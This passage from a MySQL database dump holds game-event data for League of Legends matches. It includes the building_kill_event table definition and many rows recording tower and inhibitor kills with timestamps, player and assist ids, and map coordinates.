01:25:36'),(17,'INHIBITOR_BUILDING','TOP_LANE','UNDEFINED_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(18,'TOWER_BUILDING','MID_LANE','OUTER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(19,'TOWER_BUILDING','MID_LANE','INNER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(20,'TOWER_BUILDING','MID_LANE','BASE_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(21,'INHIBITOR_BUILDING','MID_LANE','UNDEFINED_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(22,'TOWER_BUILDING','MID_LANE','NEXUS_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(23,'TOWER_BUILDING','BOT_LANE','OUTER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(24,'TOWER_BUILDING','BOT_LANE','INNER_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(25,'TOWER_BUILDING','BOT_LANE','BASE_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36'),(26,'INHIBITOR_BUILDING','BOT_LANE','UNDEFINED_TURRET','RED','5.7.2',1,'2015-04-21 01:25:36');

--
-- Table structure for table `building_kill_event`
--

CREATE TABLE `building_kill_event` (
  `building_kill_event_id` int(11) NOT NULL AUTO_INCREMENT,
  `building_team_game_id` int(11) NOT NULL,
  `killing_player_game_id` int(11) DEFAULT NULL,
  `building_id` int(11) NOT NULL,
  `game_time` int(11) NOT NULL,
  `assist_1_id` int(11) DEFAULT NULL,
  `assist_2_id` int(11) DEFAULT NULL,
  `assist_3_id` int(11) DEFAULT NULL,
  `assist_4_id` int(11) DEFAULT NULL,
  `x_pos` int(4) NOT NULL,
  `y_pos` int(4) NOT NULL,
  PRIMARY KEY (`building_kill_event_id`),
  KEY `building_kill_event_building_team_game_id` (`building_team_game_id`),
  KEY `building_kill_event_killing_player_game_id` (`killing_player_game_id`),
  KEY `building_kill_event_building_id` (`building_id`),
  KEY `building_kill_event_assisting_player_game_id_1_idx` (`assist_1_id`),
  KEY `building_kill_event_assisting_player_game_id_2_idx` (`assist_2_id`),
  KEY `building_kill_event_assisting_player_game_id_3_idx` (`assist_3_id`),
  KEY `building_kill_event_assisting_player_game_id_4_idx` (`assist_4_id`),
  CONSTRAINT `building_kill_event_assisting_player_game_id_1` FOREIGN KEY (`assist_1_id`) REFERENCES `player_game` (`game_player_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `building_kill_event_assisting_player_game_id_2` FOREIGN KEY (`assist_2_id`) REFERENCES `player_game` (`game_player_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `building_kill_event_assisting_player_game_id_3` FOREIGN KEY (`assist_3_id`) REFERENCES `player_game` (`game_player_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `building_kill_event_assisting_player_game_id_4` FOREIGN KEY (`assist_4_id`) REFERENCES `player_game` (`game_player_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `building_kill_event_killing_player_game_id` FOREIGN KEY (`killing_player_game_id`) REFERENCES `player_game` (`game_player_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `building_kill_event_building_team_game_id` FOREIGN KEY (`building_team_game_id`) REFERENCES `team_game` (`team_game_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=1595 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `building_kill_event`
--

INSERT INTO `building_kill_event` VALUES (77,121,585,23,891375,586,NULL,NULL,NULL,13866,4505),(78,120,587,1,965179,NULL,NULL,NULL,NULL,981,10441),(79,121,NULL,14,1069848,NULL,NULL,NULL,NULL,4318,13875),(80,121,585,18,1085820,586,NULL,NULL,NULL,8955,8510),(81,120,587,10,1347599,NULL,NULL,NULL,NULL,10504,1029),(82,121,NULL,24,1485420,NULL,NULL,NULL,NULL,13327,8226),(83,121,583,25,1507613,582,585,586,NULL,13624,10572),(84,121,583,26,1513729,582,585,586,NULL,13604,11316),(85,121,584,15,1515291,NULL,NULL,NULL,NULL,7943,13411),(86,121,582,19,1551604,583,585,586,NULL,9767,10113),(87,121,585,20,1571964,582,583,NULL,NULL,11134,11207),(88,121,584,21,1584345,582,583,585,NULL,11598,11667),(89,121,585,16,1699687,582,586,NULL,NULL,10481,13650),(90,121,585,17,1707480,582,584,586,NULL,11261,13676),(91,121,582,22,1715439,583,585,586,NULL,13052,12612),(92,121,NULL,22,1723465,583,585,586,NULL,12611,13084),(93,46,220,1,720954,NULL,NULL,NULL,NULL,981,10441),(94,46,219,5,934614,217,NULL,NULL,NULL,5846,6396),(95,46,217,10,1040524,220,NULL,NULL,NULL,10504,1029),(96,46,219,6,1316078,217,221,NULL,NULL,5048,4812),(97,46,220,11,1405491,219,NULL,NULL,NULL,6919,1483),(98,46,217,2,1448773,NULL,NULL,NULL,NULL,1512,6699),(99,46,217,7,1902812,218,220,NULL,NULL,3651,3696),(100,46,218,8,1914204,217,219,220,221,3203,3208),(101,46,219,9,1924903,217,218,220,221,1748,2270),(102,46,217,9,1939166,218,219,220,221,2177,1807),(103,47,NULL,23,1946292,NULL,NULL,NULL,NULL,13866,4505),(104,49,222,14,234309,223,225,226,NULL,4318,13875),(105,48,NULL,10,239139,231,NULL,NULL,NULL,10504,1029),(106,48,230,1,450418,227,228,231,NULL,981,10441),(107,48,230,5,918200,229,231,NULL,NULL,5846,6396),(108,49,225,18,1189027,223,224,226,NULL,8955,8510),(109,49,225,23,1247957,222,226,NULL,NULL,13866,4505),(110,48,230,2,1839727,228,229,231,NULL,1512,6699),(111,48,227,11,1934936,NULL,NULL,NULL,NULL,6919,1483),(112,48,230,6,1973101,227,228,231,NULL,5048,4812),(113,48,229,7,2147782,227,228,230,231,3651,3696),(114,48,230,8,2152264,227,228,229,231,3203,3208),(115,48,229,9,2160707,227,228,230,231,1748,2270),(116,48,227,9,2166301,228,229,230,231,2177,1807),(117,50,238,10,901785,237,NULL,NULL,NULL,10504,1029),(118,50,240,5,966282,237,NULL,NULL,NULL,5846,6396),(119,51,NULL,14,1016056,NULL,NULL,NULL,NULL,4318,13875),(120,51,232,15,1070400,NULL,NULL,NULL,NULL,7943,13411),(121,50,240,6,1072734,238,241,NULL,NULL,5048,4812),(122,51,235,18,1123939,236,NULL,NULL,NULL,8955,8510),(123,50,240,1,1166893,NULL,NULL,NULL,NULL,981,10441),(124,51,NULL,23,1196229,NULL,NULL,NULL,NULL,13866,4505),(125,50,240,2,1261459,NULL,NULL,NULL,NULL,1512,6699),(126,50,NULL,11,1991442,241,NULL,NULL,NULL,6919,1483),(127,50,240,12,2015866,239,241,NULL,NULL,4281,1253),(128,50,240,13,2025471,238,239,241,NULL,3452,1236),(129,50,240,3,2164920,239,241,NULL,NULL,1169,4287),(130,50,237,4,2181093,239,240,241,NULL,1171,3571),(131,50,239,9,2190133,240,241,NULL,NULL,1748,2270),(132,50,240,9,2194077,239,241,NULL,NULL,2177,1807),(133,52,NULL,10,267870,NULL,NULL,NULL,NULL,10504,1029),(134,52,250,1,562442,NULL,NULL,NULL,NULL,981,10441),(135,52,248,5,737862,249,251,NULL,NULL,5846,6396),(136,53,245,23,887098,246,NULL,NULL,NULL,13866,4505),(137,52,248,6,914308,249,250,251,NULL,5048,4812),(138,53,NULL,14,1012997,242,245,246,NULL,4318,13875),(139,53,NULL,18,1355644,244,NULL,NULL,NULL,8955,8510),(140,52,248,2,1686104,247,NULL,NULL,NULL,1512,6699),(141,52,249,7,1828993,250,251,NULL,NULL,3651,3696),(142,52,249,8,1910023,247,250,251,NULL,3203,3208),(143,52,250,9,2009572,249,NULL,NULL,NULL,1748,2270),(144,52,249,9,2013045,250,251,NULL,NULL,2177,1807),(145,54,260,10,245843,NULL,NULL,NULL,NULL,10504,1029),(146,55,255,14,355672,256,NULL,NULL,NULL,4318,13875),(147,55,255,23,793888,NULL,NULL,NULL,NULL,13866,4505),(148,54,261,1,1008740,258,260,NULL,NULL,981,10441),(149,55,NULL,18,1143074,253,255,NULL,NULL,8955,8510),(150,55,255,24,1226102,NULL,NULL,NULL,NULL,13327,8226),(151,54,259,2,1231996,258,260,261,NULL,1512,6699),(152,55,255,15,1433868,NULL,NULL,NULL,NULL,7943,13411),(153,55,252,19,1814917,253,254,NULL,NULL,9767,10113),(154,54,259,5,1845124,261,NULL,NULL,NULL,5846,6396),(155,55,255,25,2163334,252,256,NULL,NULL,13624,10572),(156,55,253,26,2448991,252,255,256,NULL,13604,11316),(157,55,NULL,16,2524926,255,NULL,NULL,NULL,10481,13650),(158,55,253,17,2529990,252,254,255,256,11261,13676),(159,55,255,20,2540314,252,256,NULL,NULL,11134,11207),(160,55,NULL,21,2551549,252,253,255,NULL,11598,11667),(161,55,NULL,22,2560157,252,255,256,NULL,13052,12612),(162,55,254,22,2563295,252,253,255,256,12611,13084),(163,57,NULL,14,789570,NULL,NULL,NULL,NULL,4318,13875),(164,56,267,5,848660,268,269,270,271,5846,6396),(165,56,270,1,889706,271,NULL,NULL,NULL,981,10441),(166,57,962,23,1037272,262,264,NULL,NULL,13866,4505),(167,56,270,10,1070407,271,NULL,NULL,NULL,10504,1029),(168,56,269,6,1527720,267,268,270,271,5048,4812),(169,57,264,18,1953603,962,NULL,NULL,NULL,8955,8510),(170,57,962,19,1964299,264,NULL,NULL,NULL,9767,10113),(171,56,269,7,2028973,270,271,NULL,NULL,3651,3696),(172,56,268,8,2032652,269,270,271,NULL,3203,3208),(173,56,270,2,2118905,267,271,NULL,NULL,1512,6699),(174,56,269,3,2197612,267,270,NULL,NULL,1169,4287),(175,56,270,9,2204250,267,269,NULL,NULL,1748,2270),(176,56,NULL,9,2208150,269,270,NULL,NULL,2177,1807),(177,58,963,5,1081544,NULL,NULL,NULL,NULL,5846,6396),(178,58,964,10,1293270,965,NULL,NULL,NULL,10504,1029),(179,59,NULL,14,1312385,NULL,NULL,NULL,NULL,4318,13875),(180,59,275,23,1379530,276,NULL,NULL,NULL,13866,4505),(181,58,963,1,1406466,277,278,NULL,NULL,981,10441),(182,59,274,18,1412180,NULL,NULL,NULL,NULL,8955,8510),(183,59,275,24,1426124,NULL,NULL,NULL,NULL,13327,8226),(184,58,278,6,2464099,963,964,NULL,NULL,5048,4812),(185,58,963,7,2482325,964,NULL,NULL,NULL,3651,3696),(186,59,274,19,2524335,272,275,NULL,NULL,9767,10113),(187,59,275,20,2534434,272,274,NULL,NULL,11134,11207),(188,59,275,21,2540734,272,274,NULL,NULL,11598,11667),(189,59,275,15,2559450,272,274,NULL,NULL,7943,13411),(190,58,NULL,11,2571984,NULL,NULL,NULL,NULL,6919,1483),(191,59,275,25,2850881,274,276,NULL,NULL,13624,10572),(192,59,272,16,2854462,NULL,NULL,NULL,NULL,10481,13650),(193,59,275,21,2871615,273,274,NULL,NULL,11598,11667),(194,59,275,26,2897496,272,274,276,NULL,13604,11316),(195,59,275,22,2911369,273,274,NULL,NULL,13052,12612),(196,59,NULL,22,2935449,273,276,NULL,NULL,12611,13084),(197,60,290,1,267654,291,NULL,NULL,NULL,981,10441),(198,61,285,23,271388,NULL,NULL,NULL,NULL,13866,4505),(199,61,286,14,629699,283,285,NULL,NULL,4318,13875),(200,60,290,10,920954,287,288,291,NULL,10504,1029),(201,61,NULL,18,1203206,282,283,284,286,8955,8510),(202,60,289,5,1598351,NULL,NULL,NULL,NULL,5846,6396),(203,60,290,6,1698483,288,291,NULL,NULL,5048,4812),(204,60,289,11,1714854,NULL,NULL,NULL,NULL,6919,1483),(205,60,289,12,1963399,NULL,NULL,NULL,NULL,4281,1253),(206,60,289,13,2029619,NULL,NULL,NULL,NULL,3452,1236),(207,60,NULL,7,2171485,290,291,NULL,NULL,3651,3696),(208,60,290,9,2198490,288,291,NULL,NULL,2177,1807),(209,60,288,9,2204565,290,291,NULL,NULL,1748,2270),(210,69,325,23,805486,NULL,NULL,NULL,NULL,13866,4505),(211,69,325,18,873725,324,326,NULL,NULL,8955,8510),(212,69,325,14,993815,323,NULL,NULL,NULL,4318,13875),(213,68,NULL,5,1001814,328,329,330,NULL,5846,6396),(214,69,326,15,1054063,322,325,NULL,NULL,7943,13411),(215,68,NULL,1,1256872,NULL,NULL,NULL,NULL,981,10441),(216,68,NULL,10,1589664,NULL,NULL,NULL,NULL,10504,1029),(217,68,330,11,1612917,328,329,331,NULL,6919,1483),(218,68,328,6,1642647,327,329,330,331,5048,4812),(219,68,NULL,2,1689713,NULL,NULL,NULL,NULL,1512,6699),(220,68,331,3,1703127,327,328,329,330,1169,4287),(221,68,327,4,1710991,328,329,330,331,1171,3571),(222,69,325,19,1822356,NULL,NULL,NULL,NULL,9767,10113),(223,68,327,7,1973084,328,330,331,NULL,3651,3696),(224,68,330,8,1978044,327,328,329,331,3203,3208),(225,68,329,12,1988807,327,328,330,331,4281,1253),(226,68,330,13,1996181,327,328,331,NULL,3452,1236),(227,68,NULL,4,2131008,327,328,329,331,1171,3571),(228,68,330,9,2165722,327,331,NULL,NULL,2177,1807),(229,68,NULL,9,2166992,331,NULL,NULL,NULL,1748,2270),(230,71,332,14,717360,NULL,NULL,NULL,NULL,4318,13875),(231,70,340,10,773763,341,NULL,NULL,NULL,10504,1029),(232,71,332,18,992208,333,336,NULL,NULL,8955,8510),(233,71,336,23,1130966,333,335,NULL,NULL,13866,4505),(234,71,335,19,1333245,336,NULL,NULL,NULL,9767,10113),(235,71,NULL,15,1359062,335,NULL,NULL,NULL,7943,13411),(236,71,333,20,1769782,332,334,336,NULL,11134,11207),(237,71,334,21,1783651,332,333,336,NULL,11598,11667),(238,70,337,1,1855570,340,341,NULL,NULL,981,10441),(239,71,334,24,1866268,NULL,NULL,NULL,NULL,13327,8226),(240,71,336,25,1884680,334,335,NULL,NULL,13624,10572),(241,71,335,26,1895415,336,NULL,NULL,NULL,13604,11316),(242,71,336,16,1952547,335,NULL,NULL,NULL,10481,13650),(243,71,332,22,1979709,335,336,NULL,NULL,13052,12612),(244,71,332,22,1982790,335,336,NULL,NULL,12611,13084),(245,73,345,14,237992,NULL,NULL,NULL,NULL,4318,13875),(246,24,350,10,270913,NULL,NULL,NULL,NULL,10504,1029),(247,73,344,18,755124,NULL,NULL,NULL,NULL,8955,8510),(248,73,NULL,23,793793,NULL,NULL,NULL,NULL,13866,4505),(249,24,347,1,1198427,NULL,NULL,NULL,NULL,981,10441),(250,73,345,19,1392637,342,346,NULL,NULL,9767,10113),(251,73,343,20,1405474,342,344,345,346,11134,11207),(252,24,347,5,1457432,351,NULL,NULL,NULL,5846,6396),(253,73,344,21,1614942,342,343,346,NULL,11598,11667),(254,73,344,24,1864380,343,345,NULL,NULL,13327,8226),(255,73,345,25,1889227,344,346,NULL,NULL,13624,10572),(256,73,NULL,26,1910648,NULL,NULL,NULL,NULL,13604,11316),(257,73,343,22,1912737,342,344,345,346,13052,12612),(258,73,343,22,1916069,342,344,345,346,12611,13084),(259,77,NULL,14,927580,NULL,NULL,NULL,NULL,4318,13875),(260,77,365,18,961169,364,366,NULL,NULL,8955,8510),(261,77,365,23,1075223,NULL,NULL,NULL,NULL,13866,4505),(262,34,371,1,1110758,368,370,NULL,NULL,981,10441),(263,77,363,24,1116510,365,NULL,NULL,NULL,13327,8226),(264,34,367,10,1559680,NULL,NULL,NULL,NULL,10504,1029),(265,34,371,5,1618372,367,369,370,NULL,5846,6396),(266,34,370,6,1632325,367,371,NULL,NULL,5048,4812),(267,77,364,19,1834095,366,NULL,NULL,NULL,9767,10113),(268,77,364,20,1931334,365,NULL,NULL,NULL,11134,11207),(269,77,363,21,2280402,362,364,365,366,11598,11667),(270,77,364,15,2398241,363,365,NULL,NULL,7943,13411),(271,77,NULL,22,2432568,NULL,NULL,NULL,NULL,13052,12612),(272,77,363,22,2439090,365,366,NULL,NULL,12611,13084),(273,35,NULL,14,569710,376,NULL,NULL,NULL,4318,13875),(274,35,375,23,674810,376,NULL,NULL,NULL,13866,4505),(275,35,375,18,734484,374,376,NULL,NULL,8955,8510),(276,32,NULL,10,954171,NULL,NULL,NULL,NULL,10504,1029),(277,35,374,19,1356552,375,376,NULL,NULL,9767,10113),(278,35,375,20,1373575,374,376,NULL,NULL,11134,11207),(279,32,380,5,1480118,378,379,NULL,NULL,5846,6396),(280,35,372,21,1623925,373,374,375,376,11598,11667),(281,35,NULL,15,1709362,375,NULL,NULL,NULL,7943,13411),(282,35,376,24,1751442,373,374,375,NULL,13327,8226),(283,35,374,25,1777993,372,373,375,376,13624,10572),(284,35,375,26,1796264,372,373,374,376,13604,11316),(285,35,374,22,1801847,372,373,375,376,13052,12612),(286,35,376,22,1808125,372,373,374,375,12611,13084),(287,33,NULL,1,507632,390,NULL,NULL,NULL,981,10441),(288,81,385,23,524260,382,383,386,NULL,13866,4505),(289,33,391,10,654329,388,390,NULL,NULL,10504,1029),(290,81,385,14,691480,NULL,NULL,NULL,NULL,4318,13875),(291,33,388,5,1077490,391,NULL,NULL,NULL,5846,6396),(292,81,NULL,24,1115857,NULL,NULL,NULL,NULL,13327,8226),(293,81,385,18,1207201,384,386,NULL,NULL,8955,8510),(294,33,389,6,1357688,387,390,391,NULL,5048,4812),(295,33,390,2,1485016,NULL,NULL,NULL,NULL,1512,6699),(296,33,389,7,1668734,387,388,390,391,3651,3696),(297,33,NULL,8,1676397,387,388,389,391,3203,3208),(298,33,NULL,11,1733804,388,NULL,NULL,NULL,6919,1483),(299,33,390,8,2143780,NULL,NULL,NULL,NULL,3203,3208),(300,33,388,3,2153191,389,390,NULL,NULL,1169,4287),(301,33,389,4,2198022,387,391,NULL,NULL,1171,3571),(302,33,390,12,2329423,387,388,389,391,4281,1253),(303,33,389,13,2334238,387,388,390,391,3452,1236),(304,33,NULL,9,2341817,NULL,NULL,NULL,NULL,1748,2270),(305,33,390,9,2344135,388,389,391,NULL,2177,1807),(306,83,395,23,237133,392,393,396,NULL,13866,4505),(307,82,400,1,237948,398,401,NULL,NULL,981,10441),(308,83,395,18,874386,394,NULL,NULL,NULL,8955,8510),(309,82,399,10,1033833,NULL,NULL,NULL,NULL,10504,1029),(310,83,392,19,1055943,393,394,395,396,9767,10113),(311,83,394,14,1199726,392,395,NULL,NULL,4318,13875),(312,83,394,15,1256925,392,393,395,396,7943,13411),(313,83,395,24,1352560,392,394,396,NULL,13327,8226),(314,83,394,25,1397353,393,395,396,NULL,13624,10572),(315,83,395,26,1405284,393,394,396,NULL,13604,11316),(316,83,NULL,22,1533882,NULL,NULL,NULL,NULL,13052,12612),(317,83,395,20,1577934,392,393,394,NULL,11134,11207),(318,83,395,21,1584000,392,393,394,NULL,11598,11667),(319,83,NULL,16,1644517,395,NULL,NULL,NULL,10481,13650),(320,83,392,22,1660202,393,395,396,NULL,12611,13084),(321,83,NULL,17,1661792,393,394,396,NULL,11261,13676),(322,87,415,23,920704,NULL,NULL,NULL,NULL,13866,4505),(323,86,417,1,1035440,NULL,NULL,NULL,NULL,981,10441),(324,86,419,5,1065072,NULL,NULL,NULL,NULL,5846,6396),(325,86,420,10,1151112,421,NULL,NULL,NULL,10504,1029),(326,87,414,18,1240669,NULL,NULL,NULL,NULL,8955,8510),(327,87,415,14,1362440,NULL,NULL,NULL,NULL,4318,13875),(328,87,412,24,1625692,NULL,NULL,NULL,NULL,13327,8226),(329,86,420,2,1748404,NULL,NULL,NULL,NULL,1512,6699),(330,86,417,11,1928268,NULL,NULL,NULL,NULL,6919,1483),(331,86,420,6,2291359,NULL,NULL,NULL,NULL,5048,4812),(332,86,420,7,2323266,419,NULL,NULL,NULL,3651,3696),(333,86,420,8,2497848,417,419,421,NULL,3203,3208),(334,86,419,9,2510309,420,421,NULL,NULL,1748,2270),(335,86,420,9,2515487,418,419,421,NULL,2177,1807),(336,89,425,14,578625,NULL,NULL,NULL,NULL,4318,13875),(337,88,429,1,921016,NULL,NULL,NULL,NULL,981,10441),(338,89,424,18,992168,NULL,NULL,NULL,NULL,8955,8510),(339,89,NULL,23,1044798,NULL,NULL,NULL,NULL,13866,4505),(340,88,430,5,1142097,431,NULL,NULL,NULL,5846,6396),(341,88,429,10,1260009,430,NULL,NULL,NULL,10504,1029),(342,89,424,19,1554481,423,425,426,NULL,9767,10113),(343,89,425,24,1707631,422,426,NULL,NULL,13327,8226),(344,89,423,20,1742010,424,425,NULL,NULL,11134,11207),(345,89,423,21,1772902,424,425,426,NULL,11598,11667),(346,89,422,15,1905003,NULL,NULL,NULL,NULL,7943,13411),(347,89,424,22,2066651,422,423,425,426,13052,12612),(348,89,425,21,2083408,423,424,426,NULL,11598,11667),(349,89,425,22,2093021,422,424,426,NULL,12611,13084),(350,90,NULL,1,769518,438,NULL,NULL,NULL,981,10441),(351,91,432,18,855838,434,NULL,NULL,NULL,8955,8510),(352,91,435,23,1011792,NULL,NULL,NULL,NULL,13866,4505),(353,90,440,10,1131349,NULL,NULL,NULL,NULL,10504,1029),(354,90,437,5,1239832,440,441,NULL,NULL,5846,6396),(355,90,440,2,1395517,437,438,441,NULL,1512,6699),(356,90,440,6,1450988,437,439,441,NULL,5048,4812),(357,91,NULL,14,1514130,NULL,NULL,NULL,NULL,4318,13875),(358,91,432,19,1706005,433,435,436,NULL,9767,10113),(359,90,438,11,2349780,439,NULL,NULL,NULL,6919,1483),(360,90,439,7,2448312,437,438,440,441,3651,3696),(361,90,439,8,2451284,437,438,440,441,3203,3208),(362,91,435,20,2587989,432,433,434,436,11134,11207),(363,91,435,21,2595811,432,433,434,436,11598,11667),(364,91,NULL,22,2779525,432,436,NULL,NULL,13052,12612),(365,91,436,22,2785859,432,434,NULL,NULL,12611,13084),(366,90,440,8,2850772,438,439,441,NULL,3203,3208),(367,91,NULL,15,2859787,NULL,NULL,NULL,NULL,7943,13411),(368,91,435,21,2936115,432,433,434,NULL,11598,11667),(369,91,434,21,3280510,435,436,NULL,NULL,11598,11667),(370,93,445,14,683015,442,446,NULL,NULL,4318,13875),(371,93,445,18,741142,442,446,NULL,NULL,8955,8510),(372,92,NULL,10,979402,NULL,NULL,NULL,NULL,10504,1029),(373,93,442,15,989306,NULL,NULL,NULL,NULL,7943,13411),(374,93,445,23,1035530,442,443,444,446,13866,4505),(375,93,NULL,19,1118607,444,445,NULL,NULL,9767,10113),(376,92,448,5,1440847,449,451,NULL,NULL,5846,6396),(377,93,NULL,24,1517141,442,444,445,NULL,13327,8226),(378,93,444,25,1530836,442,443,445,NULL,13624,10572),(379,93,443,26,1535908,442,444,445,446,13604,11316),(380,93,445,16,1630787,443,NULL,NULL,NULL,10481,13650),(381,93,NULL,22,1652528,442,444,445,446,13052,12612),(382,93,443,22,1659707,442,445,446,NULL,12611,13084),(383,95,NULL,14,655259,NULL,NULL,NULL,NULL,4318,13875),(384,95,NULL,23,886130,NULL,NULL,NULL,NULL,13866,4505),(385,94,458,1,925375,457,NULL,NULL,NULL,981,10441),(386,94,459,5,1199690,460,NULL,NULL,NULL,5846,6396),(387,95,455,18,1234866,NULL,NULL,NULL,NULL,8955,8510),(388,95,453,19,1249918,454,455,NULL,NULL,9767,10113),(389,95,452,15,1442752,455,NULL,NULL,NULL,7943,13411),(390,94,457,10,1448372,NULL,NULL,NULL,NULL,10504,1029),(391,95,NULL,20,1544651,454,456,NULL,NULL,11134,11207),(392,95,453,21,1550154,452,454,455,456,11598,11667),(393,95,NULL,16,1568794,453,455,456,NULL,10481,13650),(394,95,455,17,1575574,453,454,456,NULL,11261,13676),(395,95,456,24,1639088,453,455,NULL,NULL,13327,8226),(396,95,455,25,1658550,452,454,456,NULL,13624,10572),(397,95,455,26,1663281,452,453,454,456,13604,11316),(398,95,NULL,22,1671659,453,455,NULL,NULL,13052,12612),(399,95,455,22,1675795,453,NULL,NULL,NULL,12611,13084),(400,101,NULL,23,899575,483,486,NULL,NULL,13866,4505),(401,100,NULL,1,1011828,NULL,NULL,NULL,NULL,981,10441),(402,100,490,5,1205013,491,NULL,NULL,NULL,5846,6396),(403,100,489,2,1225068,488,NULL,NULL,NULL,1512,6699),(404,100,487,10,1439733,NULL,NULL,NULL,NULL,10504,1029),(405,101,484,18,1536138,483,NULL,NULL,NULL,8955,8510),(406,101,485,14,1539280,486,NULL,NULL,NULL,4318,13875),(407,101,485,15,1559378,486,NULL,NULL,NULL,7943,13411),(408,101,484,24,1644150,483,485,486,NULL,13327,8226),(409,101,485,19,1687157,483,484,486,NULL,9767,10113),(410,100,488,6,2072458,487,489,490,491,5048,4812),(411,101,484,16,2077465,483,485,486,NULL,10481,13650),(412,101,483,17,2080954,484,485,486,NULL,11261,13676),(413,101,482,22,2093392,483,484,485,486,12611,13084),(414,101,485,20,2193871,482,483,484,486,11134,11207),(415,101,485,21,2198894,482,483,484,486,11598,11667),(416,101,485,17,2429553,482,483,484,486,11261,13676),(417,101,485,22,2439300,482,484,486,NULL,13052,12612),(418,102,500,1,241633,497,NULL,NULL,NULL,981,10441),(419,103,495,23,269286,NULL,NULL,NULL,NULL,13866,4505),(420,102,501,10,368911,498,500,NULL,NULL,10504,1029),(421,103,NULL,14,391070,NULL,NULL,NULL,NULL,4318,13875),(422,102,498,5,962752,499,500,NULL,NULL,5846,6396),(423,103,495,18,1272590,492,494,496,NULL,8955,8510),(424,102,NULL,2,1471858,498,499,501,NULL,1512,6699),(425,103,NULL,15,1692987,494,496,NULL,NULL,7943,13411),(426,103,494,19,1709447,493,495,NULL,NULL,9767,10113),(427,103,495,24,1915017,493,494,NULL,NULL,13327,8226),(428,102,NULL,11,2127884,NULL,NULL,NULL,NULL,6919,1483),(429,103,495,16,2149573,NULL,NULL,NULL,NULL,10481,13650),(430,103,493,20,2153746,492,NULL,NULL,NULL,11134,11207),(431,103,495,17,2158516,NULL,NULL,NULL,NULL,11261,13676),(432,103,493,21,2162240,492,NULL,NULL,NULL,11598,11667),(433,103,NULL,22,2344000,NULL,NULL,NULL,NULL,12611,13084),(434,103,NULL,17,2600746,NULL,NULL,NULL,NULL,11261,13676),(435,103,493,22,2614707,495,496,NULL,NULL,13052,12612),(436,105,505,23,900981,503,506,NULL,NULL,13866,4505),(437,104,NULL,10,1037585,507,511,NULL,NULL,10504,1029),(438,105,503,14,1042801,502,504,NULL,NULL,4318,13875),(439,104,510,11,1058818,507,508,511,NULL,6919,1483),(440,105,503,15,1081688,504,NULL,NULL,NULL,7943,13411),(441,105,505,18,1234177,502,504,506,NULL,8955,8510),(442,104,NULL,5,1323721,509,510,NULL,NULL,5846,6396),(443,104,510,1,1507488,507,508,511,NULL,981,10441),(444,104,510,2,1531375,507,508,511,NULL,1512,6699),(445,104,510,3,1547210,507,508,511,NULL,1169,4287),(446,105,505,19,1554476,506,NULL,NULL,NULL,9767,10113),(447,104,510,4,1556485,507,508,511,NULL,1171,3571),(448,104,NULL,6,1689332,507,508,509,511,5048,4812),(449,104,509,9,1718882,507,510,511,NULL,1748,2270),(450,104,509,9,1725365,507,510,511,NULL,2177,1807),(451,106,520,1,539886,521,NULL,NULL,NULL,981,10441),(452,107,513,23,768375,515,516,NULL,NULL,13866,4505),(453,106,520,10,989940,521,NULL,NULL,NULL,10504,1029),(454,107,514,18,1004603,512,NULL,NULL,NULL,8955,8510),(455,107,515,14,1142653,513,NULL,NULL,NULL,4318,13875),(456,107,512,15,1236514,515,516,NULL,NULL,7943,13411),(457,107,514,19,1345360,512,513,515,NULL,9767,10113),(458,107,512,24,1567371,515,516,NULL,NULL,13327,8226),(459,107,515,25,1589085,514,516,NULL,NULL,13624,10572),(460,107,515,26,1598269,514,516,NULL,NULL,13604,11316),(461,107,514,20,1641801,513,515,516,NULL,11134,11207),(462,107,NULL,21,1646185,512,513,515,516,11598,11667),(463,107,515,22,1654946,513,514,516,NULL,13052,12612),(464,107,512,22,1662155,513,514,515,516,12611,13084),(465,108,NULL,1,241663,527,528,531,NULL,981,10441),(466,109,523,23,242900,522,525,526,NULL,13866,4505),(467,109,NULL,14,522815,523,526,NULL,NULL,4318,13875),(468,109,523,18,846613,524,526,NULL,NULL,8955,8510),(469,108,530,10,856296,528,NULL,NULL,NULL,10504,1029),(470,108,NULL,5,1661110,NULL,NULL,NULL,NULL,5846,6396),(471,109,524,19,2100986,525,NULL,NULL,NULL,9767,10113),(472,109,524,20,2111134,525,NULL,NULL,NULL,11134,11207),(473,109,524,21,2116625,525,NULL,NULL,NULL,11598,11667),(474,109,525,24,2226285,522,NULL,NULL,NULL,13327,8226),(475,109,525,25,2303034,523,NULL,NULL,NULL,13624,10572),(476,109,525,22,2316791,523,NULL,NULL,NULL,13052,12612),(477,109,525,22,2322520,523,NULL,NULL,NULL,12611,13084),(478,111,532,14,244052,535,NULL,NULL,NULL,4318,13875),(479,110,540,10,781882,541,NULL,NULL,NULL,10504,1029),(480,111,535,18,794785,536,NULL,NULL,NULL,8955,8510),(481,110,537,1,830665,539,NULL,NULL,NULL,981,10441),(482,111,535,23,886273,NULL,NULL,NULL,NULL,13866,4505),(483,111,535,19,1221437,532,NULL,NULL,NULL,9767,10113),(484,111,535,15,1453955,533,534,536,NULL,7943,13411),(485,111,NULL,16,1464773,532,533,535,536,10481,13650),(486,111,NULL,17,1469402,532,533,534,536,11261,13676),(487,111,535,22,1481956,532,534,NULL,NULL,12611,13084),(488,111,535,20,1527811,534,536,NULL,NULL,11134,11207),(489,111,532,21,1536533,533,534,535,536,11598,11667),(490,111,535,24,1555325,NULL,NULL,NULL,NULL,13327,8226),(491,111,532,22,1667571,533,534,535,536,13052,12612),(492,112,550,10,933625,551,NULL,NULL,NULL,10504,1029),(493,113,542,14,953353,543,546,NULL,NULL,4318,13875),(494,112,NULL,1,1135485,NULL,NULL,NULL,NULL,981,10441),(495,113,545,23,1309561,546,NULL,NULL,NUL